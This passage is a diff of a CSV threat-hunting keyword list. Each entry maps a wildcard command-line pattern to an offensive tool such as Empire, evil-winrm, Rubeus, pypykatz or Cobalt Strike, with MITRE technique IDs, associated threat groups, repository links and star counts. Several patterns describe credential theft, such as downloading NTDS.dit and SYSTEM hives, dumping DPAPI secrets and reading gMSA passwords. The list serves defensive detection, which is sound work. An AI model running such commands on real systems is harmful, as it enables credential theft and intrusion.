Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -domain * /dc * /service cifs /ptt*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/ricardojba/noPac","1","0","N/A","N/A","1","34","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z" "* --domain * --kerberos*","offensive_tool_keyword","gMSADumper","Lists who can read any gMSA password blobs and parses them if the current user has access.","T1552.001 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/micahvandeusen/gMSADumper","1","0","N/A","N/A","2","190","34","2023-08-23T13:32:49Z","2021-04-10T00:15:24Z" -"* -Domain * -SMB1 *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-SMBExec.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -Domain * -SMB1 *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-SMBExec.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* domainDumper*","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","N/A","Credential Access","https://github.com/dirkjanm/ldapdomaindump","1","0","N/A","N/A","10","970","176","2023-09-06T05:50:30Z","2016-05-24T18:46:56Z" "* domainhunter *","offensive_tool_keyword","domainhunter","Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names ","T1583.002 - T1568.002","TA0011 - TA0009","N/A","N/A","Phishing","https://github.com/threatexpress/domainhunter","1","0","N/A","N/A","10","1380","291","2022-10-26T03:15:13Z","2017-03-01T11:16:26Z" "* --domains ./domains.txt 
run*","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","0","N/A","6","6","577","101","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z" "* domcon-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* domcon-cmd.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* dome.py*","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","0","N/A","N/A","4","375","50","2022-03-10T12:08:17Z","2022-02-20T15:09:40Z" +"* dome.py*","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","0","N/A","N/A","4","376","52","2022-03-10T12:08:17Z","2022-02-20T15:09:40Z" "* domino-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* -DoNotPersistImmediately *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* 
--dont-enumerate-acls *","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","0","N/A","9","7","650","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" -"* --dont-enumerate-acls * -e *","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","0","N/A","9","7","650","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" +"* -DoNotPersistImmediately *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* --dont-enumerate-acls *","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","0","N/A","9","7","651","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" +"* --dont-enumerate-acls * -e *","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. 
All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","0","N/A","9","7","651","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" "* --donut --rehash n --silent -o /tmp/*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" -"* donut.c *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" -"* donut.exe *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" -"* donut.o *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"* donut.c *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"* donut.exe *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"* donut.o *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" "* --dotnetassembly * --amsi*","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","490","114","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" "* --dotnetassembly * --appdomain *","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to 
Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","490","114","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" "* --dotnetassembly * --assemblyargs *","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 
- T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","490","114","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" "* --dotnetassembly * --mailslot*","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","490","114","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" "* --dotnetassembly * --pipe *","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","490","114","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" "* -Downgrade False -Restore False -Impersonate True * -challange *","offensive_tool_keyword","Internal-Monologue","Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS","T1003 - T1051 - T1574 - T1110 - T1547","TA0003 - TA0006","N/A","N/A","Credential 
Access","https://github.com/eladshamir/Internal-Monologue","1","0","N/A","N/A","10","1283","243","2018-10-11T12:13:08Z","2017-12-09T05:59:01Z" -"* download *\NTDS\NTDS.dit*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021 - T1028 - T1046 - T1078 - T1091 - T1219","TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3760","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" -"* download *\Windows\System32\config\SYSTEM*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. 
So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021 - T1028 - T1046 - T1078 - T1091 - T1219","TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","N/A","10","3760","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" +"* download *\NTDS\NTDS.dit*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021 - T1028 - T1046 - T1078 - T1091 - T1219","TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3763","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" +"* download *\Windows\System32\config\SYSTEM*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. 
A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021 - T1028 - T1046 - T1078 - T1091 - T1219","TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","N/A","10","3763","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" "* dpap-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dpapi blob *.json *.dat*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" "* dpapi credential *.json cred*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" 
@@ -531,24 +531,24 @@ "* drda-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* DriverName *Xeroxxx*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --drop-drag-and-drop-target*","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* dump * /service:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
